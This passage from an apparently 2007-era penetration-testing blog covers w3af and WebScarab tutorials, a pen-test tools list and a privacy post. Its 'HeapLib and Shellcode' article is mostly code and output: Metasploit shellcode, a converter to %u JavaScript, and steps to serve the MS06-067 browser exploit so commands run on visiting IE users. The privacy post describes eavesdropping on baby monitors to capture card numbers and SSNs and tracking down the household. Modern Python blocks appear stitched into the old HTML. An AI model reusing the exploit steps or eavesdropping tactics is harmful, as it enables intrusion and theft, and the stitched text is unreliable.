Once this is done you can use this file to fuzz the parameters in the fuzz template.<br />Select the fuzz source for each parameter from the drop down box.<br /><br />Now click Start. If any of your fuzzing reflected an XSS payload you will see files appearing in the folder named in the script.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_acrzuhZS74A/R1t-b-Z1ZMI/AAAAAAAAAyg/f3xD3ma2NFU/s1600-h/Fuzzer.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_acrzuhZS74A/R1t-b-Z1ZMI/AAAAAAAAAyg/f3xD3ma2NFU/s320/Fuzzer.png" alt="" id="BLOGGER_PHOTO_ID_5141842418646475970" border="0" /></a><br /><br />As you can see, this can be used for several different things. You could list SQL injection strings in the Fuzzer sources and put partial SQL error messages in the file the script reads, so that a leaked database error is caught the same way a reflected payload is. Once you know your way around WebScarab and which hooks are available, you are only limited by your imagination.<br /><br /><br /><b>More on WebScarab and Scripting.</b><br />In the Script Manager you will see descriptions of the hooks available to you. I just explained the conversation hook, but there are proxy hooks as well. You can have scripts run on both the request and the response as they pass through the proxy. I used the conversation hook because I could not see the Fuzzer plugin's responses from the proxy scripts. Some ideas I have thought about implementing are alerts that pop up when patterns in the responses such as hidden error messages, IP address strings, etc. 
are found.<br /><br /><br /><span style="font-weight: bold;font-size:130%;" >W3AF Tutorial (Part 2)</span><br />Published 2007-10-19 (updated 2008-10-23)<br /><br /><span style="font-weight: bold;font-size:130%;" >Overview</span><br />In the previous article we started a basic audit with <a href="http://w3af.sourceforge.net/">w3af</a>. In this article we are going to discuss writing scripts to start an audit, and then we will look at some of the cool tools included in w3af. The next article will hopefully be about writing plugins, so stay tuned for that. A new version was released on Oct 18th. This article deals with the previous version, but none of the topics I have discussed have changed.<br /><br /><span style="font-weight: bold;font-size:130%;" >Writing StartUp scripts</span><br />If you have an audit configuration that you use over and over then scripts are a necessity. It is a pain to set the same options for your output, audit and discovery features every time when all you change is the target. We will start with a script that you can configure to meet your needs.<br /><br />Create a file named anything; I will call mine basic.w3af. 
You write the script the same way that you would actually navigate through w3af to set the settings. So the script below will set all our audit, discovery, and output plugins so that these do not need to be set up after we start w3af.<br /><br /><pre style="color: rgb(153, 0, 0);"># Basic startup script
plugins
output console,htmlFile
output
output config htmlFile
set verbosity 10
back
output config console
set verbosity 5
back

# could change this to audit all but just doing Cross Site Scripting Now
audit xss
audit

discovery webSpider,pykto,hmap,allowedMethods
discovery
back

target
set target http://localhost:8081
back
</pre><br /><br />You can also add start to the end of this file and it will automatically start profiling the target when run. 
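A dry-run checker for startup scripts like basic.w3af, added here as an example and not part of w3af: it walks the same menu tree the console does (plugins, target, output config X, back), so a command issued from the wrong menu is caught before you launch w3af. The menu grammar is an assumption modelled only on the commands this post shows, and the function names are my own.

```python
# Plugin types that get their own config sub-menu. Assumption: the post only
# shows "output config X"; the other types are assumed to behave the same way.
PLUGIN_TYPES = {"audit", "bruteforce", "discovery", "evasion", "grep", "mangle", "output"}

# Commands accepted at each menu level (assumption: modelled only on the
# commands shown in this post, not on w3af's own source).
MENU_COMMANDS = {
    "root":    {"plugins", "target", "tools", "start", "help", "exit"},
    "plugins": PLUGIN_TYPES | {"list", "help", "back"},
    "target":  {"set", "view", "help", "back"},
    "plugin":  {"set", "view", "help", "back"},   # w3af/plugin/<name>
    "tools":   {"list", "run", "help", "back"},
}


def prompt_for(path):
    """The prompt the console shows at a menu position, e.g. w3af/plugins>>>."""
    return "w3af" + "".join("/" + part for part in path) + ">>>"


def check_script(text):
    """Dry-run a startup script without launching w3af.

    Returns (errors, final_prompt). errors is a list of (line_number, message);
    line 0 is used for a problem with the script as a whole.
    """
    path = []      # menu stack: [] is the top level, ["plugin", "htmlFile"] is w3af/plugin/htmlFile
    errors = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                               # blank lines and comments
        cmd, *args = line.split()
        level = path[0] if path else "root"
        if cmd not in MENU_COMMANDS[level]:
            errors.append((lineno, "'%s' is not valid at %s" % (cmd, prompt_for(path))))
            continue
        if cmd == "back":
            # a plugin config menu returns to w3af/plugins; anything else to the top
            path = ["plugins"] if level == "plugin" else []
        elif level == "root" and cmd in ("plugins", "target", "tools"):
            path = [cmd]
        elif level == "plugins" and cmd in PLUGIN_TYPES and args[:1] == ["config"]:
            if len(args) != 2:
                errors.append((lineno, "'%s config' takes exactly one plugin name" % cmd))
            else:
                path = ["plugin", args[1]]
        elif cmd == "set" and len(args) < 2:
            errors.append((lineno, "'set' needs a parameter name and a value"))
    if path:
        errors.append((0, "script ends inside %s; add 'back' so start runs at w3af>>>"
                       % prompt_for(path)))
    return errors, prompt_for(path)


# The basic.w3af script from this post, used as sample input.
BASIC_SCRIPT = """\
# Basic startup script
plugins
output console,htmlFile
output
output config htmlFile
set verbosity 10
back
output config console
set verbosity 5
back

# could change this to audit all but just doing Cross Site Scripting Now
audit xss
audit

discovery webSpider,pykto,hmap,allowedMethods
discovery
back

target
set target http://localhost:8081
back
"""
```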
To run it just type:<br /><span style="font-weight: bold;">$ ./w3af -s basic.w3af</span><br /><br />It looks like this:<br /><pre style="color: rgb(153, 0, 0);">$ ./w3af -s basic.w3af
w3af>>> plugins
w3af/plugins>>> output console,htmlFile
w3af/plugins>>> output
Enabled output plugins:
htmlFile
console
w3af/plugins>>> output config htmlFile
w3af/plugin/htmlFile>>> set verbosity 10
w3af/plugin/htmlFile>>> back
w3af/plugins>>> output config console
w3af/plugin/console>>> set verbosity 5
w3af/plugin/console>>> back
w3af/plugins>>> audit xss
w3af/plugins>>> audit
Enabled audit plugins:
xss
w3af/plugins>>> discovery webSpider,pykto,hmap,allowedMethods
w3af/plugins>>> discovery
Enabled discovery plugins:
allowedMethods
webSpider
hmap
pykto
w3af/plugins>>> back
<span style="color: rgb(153, 0, 0);">w3af>>> 
target</span>
w3af/target>>> set target http://localhost:8081
w3af/target>>> back
w3af>>>
</pre><br /><br />Now just type start and your audit will begin.<br /><br /><br /><span style="font-weight: bold;font-size:130%;" >Tools included in w3af</span><br />There are a few really cool tools in w3af. Move to the tools folder and list them.<br /><br /><pre style="color: rgb(153, 0, 0);">w3af/tools>>> list
base64decode
base64encode
gencc
md5hash
sha1hash
urldecode
urlencode
w3af/tools>>>
</pre><br /><br />With w3af you can generate credit card numbers and hashes. Open w3af and navigate to the tools folder. The gencc command can generate credit card numbers to test applications or whatever you want. 
It will generate the following card types:<br />- mastercard<br />- visa16<br />- visa13<br />- amex<br />- discover<br />- diners<br />- enRoute<br />- jcb15<br />- jcb16<br />- voyager<br /><br />Run the following command to create a 16 digit Visa card number:<br /><br /><pre style="color: rgb(153, 0, 0);">w3af/tools>>> run gencc -t visa16
Generated VISA 16 digit card:
4916740510259019
w3af/tools>>>
</pre><br /><br />Create a sha1 hash as follows:<br /><pre style="color: rgb(153, 0, 0);">w3af/tools>>> run sha1hash -e 49167405102590194916740510259019
4b52f4ce218c72a18e644f40550b2966767137c9
w3af/tools>>>
</pre><br /><br />It also has tools to perform URL encoding and decoding, which can come in handy when testing or auditing an application. These commands are simple enough…<br /><pre style="color: rgb(153, 0, 0);">w3af/tools>>> run urlencode
w3af - urlencoder

Options:
 -h Print this help message.
 -s Characters that should not be encoded, default is / .
 -e String to be encoded.

Example: urlencode -s &% -e encodeMeNow
</pre><br /><br /><pre style="color: rgb(153, 0, 0);">w3af/tools>>> run urldecode
w3af - urldecoder

Options:
 -h Print this help message.
 -d String to be decoded.

Example: urldecode -d decodeMeNow
w3af/tools>>>
</pre><br /><br /><br />That’s all I have so far. 
I am currently working on w3af plugins and should have something ready to show soon. Please add any comments if you have something to contribute or find any inaccuracies.<br /><br /><br /><span style="font-weight: bold;font-size:130%;" >HeapLib and Shellcode</span><br />Published 2007-10-16 (updated 2008-10-23)<br /><br /><span style="font-weight: bold;">Overview</span><br />This will be a quick article about using Metasploit to generate shellcode. The shellcode I will generate will be specific to using HeapLib and the keyframe buffer overflow exploit demonstrated by Alexander Sotirov. You can find out more about Alexander Sotirov's work <a href="https://www.blackhat.com/presentations/bh-europe-07/Sotirov/Whitepaper/bh-eu-07-sotirov-WP.pdf">here</a> and download the source code from the blackhat.com archives <a href="https://www.blackhat.com/presentations/bh-europe-07/Sotirov/Sotirov-Source-Code.zip">here</a>. I will use his source code and add my generated shellcode so that we can execute any command on the Windows system whenever a user navigates to the webpage.<br /><br />First off, anyone attempting to exploit this should know a few things. This exploit has been fixed in the most recent versions of IE and does not work in any browser other than an unpatched IE browser. 
I use a virtual machine to run all my exploits.<br /><br /><span style="font-weight: bold;">Generating Shellcode + NOP Slide</span><br />To execute this vulnerability we need a NOP sled plus shellcode totalling 870 bytes. This is the limit used by HeapLib. Start Metasploit and execute the following commands.<br /><br /><pre style="color: rgb(102, 0, 0);">msf > use windows/exec
msf payload(exec) > show options

Module options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       The command string to execute
   EXITFUNC  seh              yes       Exit technique: seh, thread, process

msf payload(exec) >
msf payload(exec) > set CMD calc.exe
CMD => calc.exe
msf payload(exec) > set EXITFUNC process
EXITFUNC => process
msf payload(exec) > show options

Module options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD       calc.exe         yes       The command string to execute
   EXITFUNC  process          yes       Exit technique: seh, thread, process
</pre><br /><br /><span 
style="font-weight: bold;">Calculate the Length of the NOP Slide</span><br />To figure out the length of your NOP slide, subtract the length of the shellcode from 870.<br />If you just type generate, the length of the shellcode in bytes is displayed.<br /><pre style="color: rgb(102, 0, 0);">msf payload(exec) > generate
# windows/exec - 121 bytes
# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" +
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" +
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" +
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" +
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" +
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" +
"\x50\x68\x7e\xd8\xe2\x73\x68\x98\xfe\x8a\x0e\x57\xff\xe7" +
"\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
msf payload(exec) >
</pre><br /><br />So we need a NOP slide of 870 - 121 = 749 bytes. The -s option lets us specify a NOP slide to be placed before the shellcode, and we also need our shellcode to be in JavaScript. I know that Metasploit can generate shellcode in JavaScript, but there isn't an option that I know of to generate it on the fly. 
So I wrote a simple Java program to create the JavaScript from the Java shellcode. The program is listed below; anyone wanting to run it just needs to copy it into a file named toJS.java, change the shell array to your shellcode, and run it. It's really simple to do.<br /><br /><span style="font-weight:bold;">Generate the Payload</span><br /><pre style="color: rgb(102, 0, 0);">msf payload(exec) > generate -s 749 -t java
/*
 * windows/exec - 870 bytes
 * http://www.metasploit.com
 * NOP gen: x86/opty2
 * EXITFUNC=process, CMD=calc.exe
 */
byte shell[] = new byte[]
{
 (byte) 0x7b, (byte) 0x78, (byte) 0x71, (byte) 0x1c, (byte) 0x4b, (byte) 0x66, (byte) 0x42, (byte) 0x86,
 (byte) 0xf9, (byte) 0x77, (byte) 0x04, (byte) 0x97, (byte) 0x49, (byte) 0xb2, (byte) 0x91, (byte) 0x0b,
 (byte) 0xd5, (byte) 0x72, (byte) 0x7f, (byte) 0x71, (byte) 0x35, (byte) 0x99, (byte) 0xb4, (byte) 0x7d,
...
...
...
 0x8b,
 (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83, (byte) 0xc0, (byte) 0x6a, (byte) 0x50,
 (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73, (byte) 0x68, (byte) 0x98, (byte) 0xfe,
<span style="color: 
rgb(102, 0, 0);"> (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7, (byte) 0x63, (byte) 0x61, (byte) 0x6c,</span>
 (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65, (byte) 0x00
};
msf payload(exec) >
</pre><br /><br /><span style="font-weight: bold;">Convert Java to JavaScript</span><br /><br />Copy and paste the generated shellcode into my Java app. The code is listed below.<br /><pre style="color: rgb(0, 0, 102);">public class toJS {

    // total size of the buffer: NOP slide plus shellcode
    static int LENGTH = 870;

    static byte shell[] = new byte[]
    {
        // your shell code goes here
    };

    public static void main(String[] args) {
        String shell2 = "";
        // pack two bytes into each %u word, low byte first (little-endian)
        for (int i = 0; i &lt; LENGTH; i = i + 2)
        {
            int b1 = ((byte) shell[i + 1] &lt;&lt; 8) &amp; 0x0000ff00;
            b1 = b1 | ((byte) shell[i] &amp; 0x000000ff);
            String word = Integer.toHexString(b1);
            // left-pad to four hex digits
            if (word.length() == 0)
                word = "0000";
            else if (word.length() == 1)
                word = "000" + word;
            else if (word.length() == 2)
                word = "00" + word;
            else if (word.length() == 3)
                word = "0" + word;

            shell2 += "%u" + word;
        }
        System.out.println(shell2);
    }
}
</pre><br /><br />Run the following commands and your output should look like the following:<br /><br /><span style="color: rgb(102, 0, 0);">ascetik@ascetik:~$ javac toJS.java</span><br /><span style="color: rgb(102, 0, 0);">ascetik@ascetik:~$ java toJS</span><br /><span style="color: rgb(102, 0, 
0);">(the long %u-encoded output line, the 870-byte payload as %uXXXX words, is omitted here)</span><br /><span style="color: rgb(102, 0, 0);">ascetik@ascetik:~$ </span><br /><br /><br /><span style="font-weight: bold;">Putting It All Together</span><br />Open the file ms06-067-keyframe.html in the source code downloaded from the Black Hat site and replace his shellcode with your generated shellcode. Look for var shellcode. Load it onto your server, point your unpatched Windows XP IE browser at it, and watch your calculator pop up on the screen. 
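The packing toJS performs, and its inverse, as an added Python example that is not the post's program: encoding mirrors the Java loop (two bytes per %u word, low byte first), and decoding recovers the bytes that unescape() would lay out in memory, which is what you need when analysing a captured page rather than building one. The sample values come from the post's own listing (the payload ends with the string calc.exe and a NUL, preceded by 0xe7) plus one constructed slide byte; the function names are my own.

```python
import re

_WORD = re.compile(r"%u([0-9a-fA-F]{4})")


def to_unicode_escape(data):
    """Pack bytes into %uHHLL words, low byte first: the same thing the
    Java loop in toJS does with (shell[i+1] << 8) | shell[i]."""
    if len(data) % 2:
        raise ValueError("need an even number of bytes: each %u word carries two")
    return "".join("%%u%02x%02x" % (data[i + 1], data[i])
                   for i in range(0, len(data), 2))


def from_unicode_escape(text):
    """Inverse of to_unicode_escape: the byte string IE's unescape() would
    produce in memory. Rejects anything that is not a clean run of %u words,
    so a truncated or tampered string fails loudly instead of decoding short."""
    out = bytearray()
    pos = 0
    for m in _WORD.finditer(text):
        if m.start() != pos:
            raise ValueError("unexpected data at offset %d" % pos)
        word = int(m.group(1), 16)
        out.append(word & 0xFF)       # low byte sits first in memory
        out.append(word >> 8)
        pos = m.end()
    if pos != len(text):
        raise ValueError("trailing data at offset %d" % pos)
    return bytes(out)


def is_clean_unicode_escape(text):
    """True when text is exactly a run of %u words (what to_unicode_escape emits)."""
    try:
        from_unicode_escape(text)
        return True
    except ValueError:
        return False


def slide_length(buffer_size, shellcode_len):
    """NOP slide needed to fill HeapLib's fixed buffer (870 - 121 = 749 in the post)."""
    if shellcode_len > buffer_size:
        raise ValueError("shellcode (%d bytes) exceeds the %d byte buffer"
                         % (shellcode_len, buffer_size))
    return buffer_size - shellcode_len


def printable_strings(data, min_len=4):
    """Printable ASCII runs in decoded bytes; a quick way to spot the CMD string
    (here calc.exe) when triaging a payload pulled from a captured page."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[ -~]{%d,}" % min_len, data)]


# Sample values. TAIL_BYTES is the end of the post's payload: 0xe7 (the byte
# before the string in the generate listing), then "calc.exe" and a NUL.
# HEAD_WORDS is constructed: one made-up slide byte (0xfd) followed by the
# first five shellcode bytes of the listing; because the 749-byte slide is an
# odd length, the shellcode starts mid-word, which the decoder must handle.
TAIL_BYTES = b"\xe7calc.exe\x00"
TAIL_WORDS = "%u63e7%u6c61%u2e63%u7865%u0065"
HEAD_WORDS = "%ufcfd%u44e8%u0000"
```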
YAY, you're done!<br /><br /><span style="font-weight: bold;">Or Just Use Metasploit for Everything</span><br />You can also use Metasploit to automate everything and let Metasploit be your web server too, just by running the following commands:<br /><br /><pre style="color: rgb(102, 0, 0);">msf > use windows/browser/ms06_067_keyframe
msf exploit(ms06_067_keyframe) > set URIPATH exploitme
URIPATH => exploitme
msf exploit(ms06_067_keyframe) > set TARGET 0
TARGET => 0
msf exploit(ms06_067_keyframe) > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf exploit(ms06_067_keyframe) > set CMD calc.exe
CMD => calc.exe
msf exploit(ms06_067_keyframe) >
</pre><br /><br />Now to run the exploit.<br /><br /><pre style="color: rgb(102, 0, 0);">msf exploit(ms06_067_keyframe) > exploit
[*] Using URL: http://192.168.1.101:8080/exploitme
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_067_keyframe) >
</pre><br /><br />Point your browser to http://192.168.1.101:8080/exploitme and the calculator will run from the browser.<br /><br /><br /><span style="font-weight: bold;font-size:130%;" >W3AF Tutorial (Part 1)</span><br />Published 2007-10-03 (updated 2007-10-05)<br /><br /><span style="font-weight: bold;">Overview</span><br /><a href="http://w3af.sourceforge.net/">w3af</a> stands for web auditing and attack framework. I have heard some say that it is the <a href="http://www.metasploit.com/">metasploit</a> for web applications. w3af is basically a free open source web application scanner. w3af has many plugins that are divided into attack, audit, exploit, discovery, evasion, bruteforce, mangle and a few others. The code is well commented and written in Python, so writing your own exploits and plugins should be trivial, but I cannot say for sure since I have not tried as of yet. I will spend more time on this in later articles. This will be the first of many w3af tutorials.<br /><br /><span style="font-weight: bold;">Getting started</span><br />I have installed it on both <a href="http://www.ubuntu.com/">Ubuntu Feisty</a> and Cygwin for Windows. Both installs are relatively painless. Just follow the instructions in the <a href="http://w3af.sourceforge.net/documentation/user/w3afUsersGuide.pdf">w3afUsersGuide</a> and you will be fine.<br /><br />Once you have all the prerequisites you can start w3af as follows:<br /><br /><pre>$ ./w3af
w3af>>></pre><br /><br />Typing help will give you a list of options.<br /><pre>w3af>>> help
The following commands are available:
help You are here. 
help [command] prints more specific help.
url-settings   Configure the URL opener.
misc-settings  Configure w3af misc settings.
session        Load and save sessions.
plugins        Enable, disable and configure plugins.
start          Start site analysis.
exploit        Exploit a vulnerability.
tools          Enter the tools section.
target         Set the target URL.
exit           Exit w3af.
w3af>>>
</pre><br /><br />First we need to talk about how the w3af interface is organised. You move forward by typing a given option and back by typing back. Type view to see a list of configurable options and use the set command to change them. Below we will set the target. This will be the URL that we will be auditing.<br /><br /><span style="font-weight: bold;">Configuration:</span><br /><pre>w3af>>> target
w3af/target>>> help
The following commands are available:
help  You are here. help [command|parameter] prints more specific help.
set   Set a parameter value.
view  List all configuration parameters and current values.
back  Return to previous menu.
w3af/target>>> view
Parameter  Value  Description
=========  =====  ===========
target            A comma separated list of URLs
w3af/target>>> set target http://localhost:8080
w3af/target>>> view
</pre><br /><br />Now let's configure our plugins.<br /><pre>w3af/target>>> back
w3af>>> plugins
w3af/plugins>>> help
The following commands are available:
help You are here. 
help [command] prints more specific help.
list        List all available plugins.
audit       Enable and configure audit plugins.
bruteforce  Enable and configure bruteforce plugins.
discovery   Enable and configure discovery plugins.
evasion     Enable and configure evasion plugins.
grep        Enable and configure grep plugins.
mangle      Enable and configure mangle plugins.
output      Enable and configure output plugins.
back        Return to previous menu.
</pre><br /><br />To audit a web application we need at least three plugin types configured: audit, discovery, and output. Typing list plus the plugin type will show all available plugins of that type. If you type <b>list audit</b> you will see all the audit plugins, like xss, xsrf, sql injection, ldap injection, etc. Typing <b>list discovery</b> will display all discovery plugins. <br />Just typing the plugin type (i.e. <b>audit</b>) will display which plugins are enabled. By default no plugins are enabled for any of the types; you will have to add them. Some examples would be:<br /><pre> w3af/plugins>>> audit xss,xsrf,sqli </pre> to select a few plugins to load,<br />or <br /><pre> w3af/plugins>>> audit all </pre> to load all of them.<br /><br /><br />I am going to configure our web server audit to test for Cross Site Scripting and typical web server vulnerabilities, and we want it to spider (crawl) the entire site. We also want to save the results into an HTML audit report. 
To do this we need to run the following commands:<br /><br /><pre>w3af/plugins>>> audit xss
w3af/plugins>>> audit
Enabled audit plugins:
xss
w3af/plugins>>> discovery webSpider,pykto,hmap
w3af/plugins>>> discovery
Enabled discovery plugins:
webSpider
pykto
w3af/plugins>>> output console,htmlFile
w3af/plugins>>> output
Enabled output plugins:
htmlFile
console
w3af/plugins>>> output config htmlFile
w3af/plugin/htmlFile>>> view
Parameter     Value            Description
=========     =====            ===========
verbosity     0                Verbosity level for this plugin.
httpFileName  output-http.txt  File name where this plugin will write HTTP requests and responses
reportDebug   False            True if debug information will be appended to the report.
fileName      report.html      File name where this plugin will write to
</pre><br /><br />I have just configured a basic audit with w3af to test for XSS. We initially set the target to http://localhost/ so it will scan my local Apache server. I used pykto, which is a perl version of nikto, to scan for web server vulnerabilities. The webSpider plugin will do all the URL crawling and create lists of URLs to audit. The output plugins will write the results to the command line and to the HTML file called report.html in your application folder. The HTML output will not be available until the audit is complete. hmap fingerprints the server. 
The output-http.txt file records server requests and responses.<br /><br />Start the audit as follows:<br /><pre>w3af/plugin/htmlFile>>> back
w3af/plugins>>> back
w3af>>> start
</pre><br /><br />Be prepared to wait a while for the audit to complete.<br /><pre>w3af>>> start
Auto-enabling plugin: discovery.allowedMethods
Auto-enabling plugin: discovery.error404page
Auto-enabling plugin: discovery.serverHeader
The Server header for this HTTP server is: Apache/2.2.3 (Ubuntu) PHP/5.2.1
Hmap plugin is starting. Fingerprinting may take a while.
The most accurate fingerprint for this HTTP server is: Apache/2.0.55 (Ubuntu) PHP/5.1.2
pykto plugin is using "Apache/2.0.55 (Ubuntu) PHP/5.1.2" as the remote server type. This information was obtained by hmap plugin.
pykto plugin found a vulnerability at URL: http://localhost/icons/ . Vulnerability description: Directory indexing is enabled, it should only be enabled for specific directories (if required). If indexing is not used, the /icons directory should be removed. The vulnerability was found in the request with id 128.
pykto plugin found a vulnerability at URL: http://localhost/doc/ . Vulnerability description: The /doc directory is browsable. This may be /usr/doc. The vulnerability was found in the request with id 1865.
pykto plugin found a vulnerability at URL: http://localhost/\&gt;&lt;img%20src=\javascript:alert(document.domain)\&gt; . Vulnerability description: The IBM Web Traffic Express Caching Proxy is vulnerable to Cross Site Scripting (XSS). CA-2000-02. The vulnerability was found in the request with id 3385.
New URL found by discovery: http://localhost/
New URL found by discovery: http://localhost/test2.html
New URL found by discovery: http://localhost/xst2.html
New URL found by discovery: http://localhost/xst.html
New URL found by discovery: http://localhost/test.html
</pre><br /><br />Here is an example of the results.html:<br /><a href="http://bp2.blogger.com/_acrzuhZS74A/RwRsWKYUXgI/AAAAAAAAAs0/05NwCgcZPBI/s1600-h/w3af+results.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_acrzuhZS74A/RwRsWKYUXgI/AAAAAAAAAs0/05NwCgcZPBI/s320/w3af+results.png" alt="" id="BLOGGER_PHOTO_ID_5117334204599000578" border="0" /></a><br /><br /><br /><span style="font-weight: bold;font-size:130%;" >Hacking your kids</span><br />Published 2007-09-25 (updated 2007-10-03)<br /><br />Let's talk about hacking your kids! Yes, those small carbon-based units that crawl around on the floor, drool, and terrorize the neighbors are actually a data security risk. And it's not just a risk to your reputation because little Timmy ran around all day yesterday telling the neighbors about the fight you had with mommy. 
There are other issues much deeper and far more damaging to your privacy.<br /><br />Here are the security threats I found relevant recently.<br /><span style="font-weight: bold;">Scenario 1 (Your kids are the back door) </span><br />Recently, while conducting a pen test of a web application, we were able to escalate our privileges and gain access to the entire database through a SQL injection vulnerability. My colleague says, "Hey, this username looks really familiar. I think I know this guy." So we query his password as part of the evidence we need to make our case that SQL injection really is bad. (Upper management does not always agree unless you can give them shock and awe.) Once the password is revealed, it is made clear how my colleague knows this user. His wife happens to be involved in a social event where this user's kid also belongs. This particular password is a maneuver the kid performs in a sport he is interested in. It was the combination of the sport plus a significant date in the user's life. To make matters worse, it was also his kid's MySpace page screen name! Just knowing a little information about this user would make it relatively easy to gain access to this account. Kids are your life and you can't help talking about them and their interests. This is also why they don't make good passwords!<br /><br /><span style="font-weight: bold;">Scenario 2 (Babies are bugging my house!) </span><br />I know quite a lot of people with babies right now. It's my age bracket for sure. They are everywhere! Crawling, drooling, spitting up, and listening for bad habits to pick up on. But one thing that is also common to all people who have babies is baby monitors. And some people never think to turn the base off! Who needs the Patriot Act when you have wireless communications bleeding into the neighborhood voluntarily? This is the incident that inspired me to write this article. 
We were listening in on the conversation through the baby monitor, and it becomes apparent that this user is talking to his credit card company about a dispute. We are given the CVV, the full number, SSN and his address, which should not be hard to find since you know it's within a one- or two-house radius. And let's say you don't know the address and you want to find it. Here are the clues.... look for parents with babies, toys in the yard, or pretend to be a Jehovah's Witness and walk door to door. Your friend sitting in the car with the baby monitor will hear the knock on the door and then you will know.<br /><br /><span style="font-weight: bold;">Conclusion</span><br />I know I'm probably speaking to the choir for anyone actually reading this, but here is my advice. Be careful about the information you use to protect yourself. Use strong passwords: letters, numbers and special characters if you can. I like passphrases. They are much harder to guess or brute-force, and it makes it easier to remember a 30-character password this way (e.g. IL1k32B10ggAb0tP3nT3st1n9). Try not to use anything as a password that is really important to you. More than likely you talk about it a lot and your kid is blogging about it. A little reconnaissance and you are pwnd! Be careful what you say around the baby monitor base. This should be obvious. 
Anyone within at least a two-house radius can hear you if they want to.<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2410549130005981530.post-84210899894746685002007-09-23T00:48:00.000-05:002007-10-03T03:06:36.900-05:00Pen Testing Web Applications 101There are several tools that should be in every web application pen tester's toolkit. I will spend a little time talking about each of these and what functions they perform. I cannot hope to cover all the topics of web app pen testing in one blog post. This is my essential list of the tools that I use. If anyone has any ideas or thinks I may have missed anything, then please add it to the comments. I'd love to know what other people use and think is relevant. If you are new to pen testing web apps, then this post should get you started.<br /><br /><span style="font-weight: bold;">FireFox</span><br />My main tool to start pen testing a web application is <a href="http://www.firefox.com/">FireFox</a>, loaded down with a ton of extensions. You have to interact with the application as a user and not just turn your favorite scanner loose on it. I have never found anything with a scanner that I would not have found by manually testing the application. I have, however, found many more vulnerabilities that the scanners could never dream of. 
My list of extensions follows:<br /><ol><li><a href="https://addons.mozilla.org/en-US/firefox/addon/966">TamperData</a> - It's a quick and dirty local proxy that allows you to intercept requests and modify them before submitting them to the server.<br /></li><li><a href="https://addons.mozilla.org/en-US/firefox/addon/60">WebDeveloper</a> Toolbar - Essential. Allows you quick access to view page source, see form details, display and modify hidden fields, etc.<br /></li><li><a href="https://addons.mozilla.org/en-US/firefox/addon/573">Add N Edit Cookies</a> - Great for cookie poisoning... it allows you to edit cookies. Nuff said.</li><li><a href="https://addons.mozilla.org/en-US/firefox/addon/590">ShowIP</a> - Displays the IP address of the server you are connected to as well as hot links to tools on dnsStuff.com.<br /></li><li><a href="https://addons.mozilla.org/en-US/firefox/addon/2464">FoxyProxy</a> - Allows you to switch proxies on the fly or by pattern. I don't know what I would do without this. I use it to switch between my corp proxy at work and home, WebScarab or Burp, and to create patterns so that the site I'm testing always goes through WebScarab but any other site goes direct.</li></ol><span style="font-weight: bold;">Proxies</span><span><br />A local proxy is essential for testing any web application. These allow you to perform a man-in-the-middle attack on your own browser session. This is useful in bypassing client-side validations like limiting the number of characters in an input box or JavaScript that checks for numeric-only characters. These also allow you to poison cookies, change GET to POST, tamper with the headers, add POST parameters, and modify hidden fields; any part of the HTTP request can be modified before submitting it to the server. 
Below is a list of proxies I prefer.<br /></span><ol><li><a href="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project#Project_Contributors">WebScarab</a> - allows importing of WSDLs for fuzzing web services, spider functionality, manual requests, session ID analysis, and encoding/decoding features.<br /></li><li><a href="http://portswigger.net/suite/">Burp Suite</a> - spider functionality, replay requests, fuzzing features.<br /></li><li><a href="https://addons.mozilla.org/en-US/firefox/addon/966">TamperData</a> - the most limited of the three but has some great features. You do not have to change your proxy setting to use it; it has XSS and SQL injection presets and encoding/decoding features. It does not have functionality to modify raw HTTP requests.<br /></li></ol><span style="font-weight: bold;">Other Open Source Tools</span><br /><ol><li><a href="http://www.cirt.net/code/nikto.shtml">Nikto</a> - Looks for vulnerabilities in web servers.<br /></li><li><a href="http://w3af.sourceforge.net/">w3af</a> - Web Attack and Auditing Framework. I'm still testing this out at the moment. It provides checks for common web application vulnerabilities like SQL injection, XSS, URL guessing, etc. and generates an HTML report on the findings.<br /></li><li><a href="http://netcat.sourceforge.net/">netcat</a> - a networking utility to read and write data to network connections.<br /></li></ol><a href="http://en.wikipedia.org/wiki/Brain"><span style="font-weight: bold;">Gray Matter</span></a><br />This is the most important tool. Really understand how the application is built and what technologies it employs. Understand the authorization model: what type of data does the application handle, how is it stored, who has access to the data, what are all the possible entry points into the application (i.e. flat files, external databases, JMS...), what is the password policy, how many failed login attempts before lockout, and are there audit and logging mechanisms? 
